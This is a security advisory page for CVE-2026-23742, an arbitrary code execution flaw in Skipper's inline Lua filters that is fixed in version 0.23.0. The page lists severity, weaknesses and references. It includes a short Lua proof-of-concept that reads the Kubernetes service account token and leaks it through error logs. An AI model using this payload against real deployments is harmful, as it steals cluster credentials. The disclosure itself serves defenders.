Advisory Database
  • Advisories
  • Dependency Scanning
  1. golang
  2. ›
  3. github.com/zalando/skipper
  4. ›
  5. CVE-2026-23742

CVE-2026-23742: Skipper is vulnerable to arbitrary code execution through lua filters

January 16, 2026

Arbitrary code execution through lua filters.

The default skipper configuration before v0.23 was -lua-sources=inline,file. The problem starts if untrusted users can create lua filters, because of -lua-sources=inline , for example through a Kubernetes Ingress resource. The configuration inline allows these user to create a script that is able to read the filesystem accessible to the skipper process and if the user has access to read the logs they an read skipper secrets.

Kubernetes example (vulnerability is not limited to Kubernetes)

function request(ctx, params)
local file = io.open('/var/run/secrets/kubernetes.io/serviceaccount/token', 'r')
if file then
local token = file:read('*all')
file:close()
error('[EXFIL] ' .. token)  -- Exfiltrate via error logs
end
end

References

  • github.com/advisories/GHSA-cc8m-98fm-rc9g
  • github.com/zalando/skipper
  • github.com/zalando/skipper/commit/0b52894570773b29e2f3c571b94b4211ef8fa714
  • github.com/zalando/skipper/releases/tag/v0.23.0
  • github.com/zalando/skipper/security/advisories/GHSA-cc8m-98fm-rc9g
  • nvd.nist.gov/vuln/detail/CVE-2026-23742

Code Behaviors & Features

Detect and mitigate CVE-2026-23742 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →

Affected versions

All versions before 0.23.0

Fixed versions

  • 0.23.0

Solution

Upgrade to version 0.23.0 or above.

Impact 8.8 HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Learn more about CVSS

Weakness

  • CWE-250: Execution with Unnecessary Privileges
  • CWE-522: Insufficiently Protected Credentials
  • CWE-94: Improper Control of Generation of Code ('Code Injection')

Source file

go/github.com/zalando/skipper/CVE-2026-23742.yml

Spotted a mistake? Edit the file on GitLab.

  • Site Repo
  • About GitLab
  • Terms
  • Privacy Statement
  • Contact

Page generated Wed, 04 Feb 2026 00:35:22 +0000.